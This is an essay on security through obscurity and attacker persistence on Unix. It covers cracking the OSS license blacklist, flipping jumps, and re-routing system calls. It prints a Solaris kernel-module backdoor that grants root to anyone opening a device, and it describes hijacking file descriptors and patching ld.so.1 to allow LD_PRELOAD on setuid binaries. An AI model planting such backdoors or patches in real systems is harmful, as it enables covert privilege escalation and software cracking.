Security, Trust and Obscurity: A Tale of Few Bytes
This document has been obsoleted by Un*x Mischiefs: The New Frontiers.
Introduction
In the short history of computing, the semantics of security and trust have changed, and they keep changing. There was perhaps a time when wizards were wizards and programming was black magic, and security through obscurity usually worked. In these volatile times, when the Open Source Movement is gaining strength with each passing day, attempts at obscurity seem naïve and futile. We live in a progressively enlightened computing age, where a lack of knowledge among the masses should not be taken for granted. For example, if I run an installation of Linux, FreeBSD or some other "free" and/or open source system, or even something like Solaris, I would not be complacent enough to believe that the only tricks miscreants (a.k.a. crackers) could play on my system are guessing (conventionally referred to as "breaking") passwords and planting trojans and setuid binaries. The tricks, traps and trojans of today are far more sophisticated, both in conception and in implementation. Breaking into a system and gaining privileges is one part of the story; modifying the system minimally to avoid detection and to maintain a foothold on it is another. It is this latter aspect that I primarily discuss in this document, with some examples.
Naïvety Prevails ...
Naïvety is inherent in most of us. What would be naïve in the context of security? Well, a cracker using relatively non-technical methods such as social engineering to gain entry into a system may be considered naïve (although statistically this has proved to be an effective form of naïvety). Using rot13 to "protect" confidential data would (hopefully) be naïve. Planting a setuid root shell would be naïve by today's standards. The concept is fuzzy and quite subjective. In particular, attempts to be obscure in software are usually naïve (even though it is often extremely hard to visually decipher an IOCCC winning entry!). Let us consider a real life example.
Security in Obscurity?
4Front Technologies is a US based company that develops Open Sound System, a set of device drivers that provide a uniform API for digital audio across major UNIX architectures. The first OSS driver was for Linux, where it continues to be popular. OSS is commercial software (costing US $20 as of this writing), though there's a free download that has a limited activity period. When you buy a copy of OSS, you get a license that allows you free upgrades for the next few years or so. As it happens on the big, bad Internet, somebody gave away his OSS license to a "friend", who gave it to his "friend", and so on. The OSS guys would have been understandably unhappy with this misuse.
They came up with an obvious (but naïve) solution: embed a list of offending license numbers in the driver wrapper (a program that authenticates the license and activates the driver). This was possible because a list of such (misused) license numbers was being maintained. Thus, at runtime, the wrapper compares the license number against those in the list, and if there's a match, it refuses to activate the driver. It is important to understand that the license file itself cannot be modified (to change the number, for example) because of its design. The wrapper binary is another matter: it is quite simple to do a string search on it and locate the string of interest, which can then be conveniently modified using GNU Emacs (or some hex editor). What we see here is a common misconception: that there's security in obscurity.
Apparently the OSS guys figured out that this was too simple and ineffective a fix, and so they came up with a marginally less naïve solution: do not maintain the black-list as strings, but keep the license numbers as raw data instead. Unfortunately, the enterprising would now just have to run something like "od -x" (or a functional equivalent) on the binary, and search for their number (taking endian-ness into account).
This could result in several matches, but that's not really a problem because:
- one could try to modify all matches, one at a time, and see if it works
- since in the new scheme, all black-listed numbers are still together, one could try a longer match
We see a related misconception here: there's security in raw (binary) data. This belief is not without reason: raw data is obscure to many people - at least to the extent that most people would not bother to decipher binary data (which may require endian-ness to be taken care of).
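To show how little the raw encoding hides, here is a minimal sketch of the search that "od -x" plus a sharp eye performs by hand. It assumes, purely for illustration, that a license number is stored as a 32-bit integer; the helper names encode_u32 and find_u32 are hypothetical and have nothing to do with the actual OSS wrapper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Encode a 32-bit value as 4 bytes in the requested byte order. */
static void encode_u32(uint32_t value, int little_endian, unsigned char out[4])
{
    for (int i = 0; i < 4; i++) {
        int shift = little_endian ? 8 * i : 8 * (3 - i);
        out[i] = (unsigned char)(value >> shift);
    }
}

/*
 * Return the offset of the first occurrence of `value` in `buf`, encoded in
 * the requested byte order, or -1 if it does not occur. The 32-bit width is
 * an assumption made for this sketch.
 */
static long find_u32(const unsigned char *buf, size_t len,
                     uint32_t value, int little_endian)
{
    unsigned char needle[4];

    assert(buf != NULL);
    encode_u32(value, little_endian, needle);
    for (size_t off = 0; off + sizeof needle <= len; off++) {
        if (memcmp(buf + off, needle, sizeof needle) == 0)
            return (long)off;
    }
    return -1;
}
```

Calling find_u32 once with each byte order covers the endian-ness question; a number stored as raw data is exactly as findable as one stored as a string.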
What next? Even if really smart logic is put in the wrapper, it must still use a conditional branch (such as je or jne on the x86, or be or bne on SPARC) at the point where it decides whether the license number is black-listed or not. With some enterprise and some educated, technically guided guesswork, it should be possible to logically negate the conditional jump (replace jne by je, for example) and see if it still complains.
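Why a single branch is such a fragile guard can be seen from the x86 encoding itself. The sketch below covers only the short (8-bit displacement) conditional jumps, which occupy opcodes 0x70 through 0x7F; within that range a condition and its negation differ only in the lowest bit. The function names are hypothetical, and other jump encodings are deliberately left out.

```c
#include <assert.h>

/* True if `opcode` is a short conditional jump (Jcc rel8) on x86. */
static int is_short_jcc(unsigned char opcode)
{
    return opcode >= 0x70 && opcode <= 0x7F;
}

/*
 * Return the opcode for the opposite condition. In the 0x70..0x7F range
 * each pair (je 0x74 / jne 0x75, for example) differs only in bit 0.
 */
static unsigned char negate_short_jcc(unsigned char opcode)
{
    assert(is_short_jcc(opcode));
    return (unsigned char)(opcode ^ 0x01);
}
```

In other words, the entire decision made by the check rests on one bit of one byte.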
Finally, to their credit, the OSS guys overhauled their licensing scheme, which possibly required people to download a new license.
Reverse engineering of commercial software is typically prohibited by its license, so using OSS in the above way would be illegal (and of course, there's an illegitimately obtained license in the picture). It would still be illegal if there were no license involved but only a modification to the software to make it work without buying it. The episode also shows that, in this case, the worth of $20 in bytes is 4.
Crippled Software
Often we come across software versions that are crippled (because they are try-out versions, or "lite" versions, etc.). Consider a streaming media player: a crippled version of it might not allow saving or recording of the audio stream being played (this feature may be present in the commercial version only). For the technically oriented, it is not too hard to arrange for a copy of the audio data to be saved as it is written to the audio hardware.
Consider software that is time-crippled: it would run only for a stipulated time, after which you are expected to purchase the retail version. Those who are bent upon making the expired software work resort to tricks like changing the system date, which usually hampers certain aspects of the system (the file-system may not like it!). With kernel source at hand, it is possible to modify time related system calls (or the corresponding library stubs) so that they report time on a per-file basis: simply report a historical time to the expired software, and the actual time to the rest of the system. Every system call could potentially be modified this way. What happens to the integrity of the operating system is debatable.
Actually there's a relatively constructive way to look at this concept: why not have a neat framework in which it is possible to dynamically change the system call vector? A flexible user-interface and programming API would allow the privileged user to (re)route system calls to alternate implementations, maybe on a per-file basis. The concept has interesting applications: assume that you would like to keep a file /etc/secrets on your system, but you want it to be inaccessible no matter who is trying to open it (even if it is "root" herself). You could instruct the above framework to make the open system call fail for /etc/secrets. What's more, if this framework is toggleable (it can be switched on and off), the toggling could be passworded (with the password encrypted and stored in kernel memory). You could block reboot if you want to.
If you would like to see a prototype of such a system call trailing, blocking and re-routing system, take a look at the AUDIT framework I implemented. It is implemented for Linux purely as a loadable module.
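The per-file re-routing idea can be sketched in user space as a small table that maps a path to an alternate handler. This is only a toy model under stated assumptions: the names (routed_open, add_route, deny_open and so on) are hypothetical, default_open merely pretends to succeed, and none of it reflects how the AUDIT framework or a real kernel system call vector is implemented.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <string.h>

typedef int (*open_handler_t)(const char *path);

/* Stand-in for the original open: pretend every path opens as fd 3. */
static int default_open(const char *path)
{
    (void)path;
    return 3;
}

/* Alternate implementation that always refuses. */
static int deny_open(const char *path)
{
    (void)path;
    return -EACCES;
}

struct route {
    const char    *path;     /* file the rule applies to */
    open_handler_t handler;  /* implementation to use for that file */
};

#define MAX_ROUTES 8
static struct route routes[MAX_ROUTES];
static size_t route_count;
static int routing_enabled = 1;  /* the on/off toggle (no password here) */

/* Register an alternate handler for one path; returns -1 if the table is full. */
static int add_route(const char *path, open_handler_t handler)
{
    assert(path != NULL && handler != NULL);
    if (route_count == MAX_ROUTES)
        return -1;
    routes[route_count].path = path;
    routes[route_count].handler = handler;
    route_count++;
    return 0;
}

/* Dispatch: use the routed handler if one matches, else the default. */
static int routed_open(const char *path)
{
    if (routing_enabled) {
        for (size_t i = 0; i < route_count; i++) {
            if (strcmp(routes[i].path, path) == 0)
                return routes[i].handler(path);
        }
    }
    return default_open(path);
}
```

After add_route("/etc/secrets", deny_open), a call to routed_open("/etc/secrets") fails with -EACCES while every other path is unaffected; clearing routing_enabled restores the default behaviour everywhere.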
Downloading code into the kernel
These days trojans are often planted within the kernel - these trojans are planted by serious and technically fluent hackers, who can be really creative. Let us conceptualize a loadable module in Solaris that would be the equivalent of a setuid root binary, but much less likely to be detected by system administrators, at least naïve ones. The module implements a device driver for a pseudo device foo, say. The driver source is compiled, and the binary is placed in /kernel/drv. add_drv(1M) is used to add the driver to the system, which will create a pseudo device file in /devices/pseudo. The interesting part of the code, which would compile to a couple of kilobytes or so, looks like the following:
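static int
foo_open(dev_t *devp, int openflags, int otyp, cred_t *credp)
{
        int retval = 0;

        /* use ddi_get_soft_state() or something */

        /* Overwrite the caller's credentials: every uid and gid becomes 0. */
        credp->cr_uid = 0;      /* effective uid */
        credp->cr_gid = 0;      /* effective gid */
        credp->cr_ruid = 0;     /* real uid */
        credp->cr_rgid = 0;     /* real gid */
        credp->cr_suid = 0;     /* saved uid */
        credp->cr_sgid = 0;     /* saved gid */

        return (retval);
}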
As is evident, whoever does an open on the device (cat /devices/pseudo/foo-whatever) gets his credential structure (sys/cred.h) modified as shown above, with his (rs)[ug]id set to 0.
Killing and Hijacking File Descriptors
This is a creatively destructive prank that some hacker could play on a system he has compromised. The idea is to take over an open file descriptor belonging to some other process. For example, an active telnet session would have a descriptor open for the socket. In a few lines of code, it would be possible to write a program (a loadable kernel module, or a user application that writes to kernel memory) that for a given pid, hijacks a given descriptor - either by dup()ing it for the hijacker and closing the original, or by swapping it with a dummy descriptor belonging to the hijacker. The original guy gets his connection terminated (which would not look too abnormal), and the hijacker gets the victim's connection. As is evident, weird tricks are possible when people can understand and modify the kernel.
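The swap variant is easiest to see on a toy model of per-process descriptor tables. The sketch below is plain user-space C with hypothetical types (struct process, struct open_file) that only mimic the shape of the idea; real kernel structures, locking and reference counting are deliberately left out.

```c
#include <assert.h>
#include <stddef.h>

#define TABLE_SIZE 8

/* Toy stand-in for a kernel open-file object. */
struct open_file {
    const char *description;
};

/* Toy stand-in for a process and its descriptor table. */
struct process {
    int pid;
    struct open_file *fds[TABLE_SIZE];
};

/*
 * Swap descriptor `vfd` of the victim with descriptor `hfd` of the
 * hijacker. Returns 0 on success, -1 if either slot is out of range
 * or not open.
 */
static int swap_descriptor(struct process *victim, int vfd,
                           struct process *hijacker, int hfd)
{
    struct open_file *tmp;

    assert(victim != NULL && hijacker != NULL);
    if (vfd < 0 || vfd >= TABLE_SIZE || hfd < 0 || hfd >= TABLE_SIZE)
        return -1;
    if (victim->fds[vfd] == NULL || hijacker->fds[hfd] == NULL)
        return -1;

    tmp = victim->fds[vfd];
    victim->fds[vfd] = hijacker->fds[hfd];
    hijacker->fds[hfd] = tmp;
    return 0;
}
```

After the swap, the victim's descriptor number is still valid but refers to the dummy file, while the hijacker's descriptor refers to the victim's original connection.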
Modify the runtime linker
Dynamic applications consist of one or more dynamic objects. ld.so.1 is the interpreter (runtime linker) that resolves the shared object dependencies of the application. As is pretty well known by now, the LD_PRELOAD variable lets you specify additional shared objects that are to be loaded when the program starts, before any other shared objects that the program references. This, in effect, is a user-level way of re-routing function calls and system calls (stubs). Obviously, this feature is not honored for setuid objects; otherwise any user could supply an open() implementation that execs /bin/sh, and use it while running a setuid binary (like ping). On Solaris, disassembling ld.so.1 with the dis utility and examining the output quickly reveals the location of the code that checks whether the file is setuid or not (the S_ISXXX family of masks, S_ISUID in particular). A couple of bytes is all it takes to disable this check: change the machine instructions in place, and the new ld.so.1 allows LD_PRELOAD for all binaries, setuid or not.
Reflections on Trusting Trust
...
Update
This article is incomplete. Please see Un*x Mischiefs: The New Frontiers.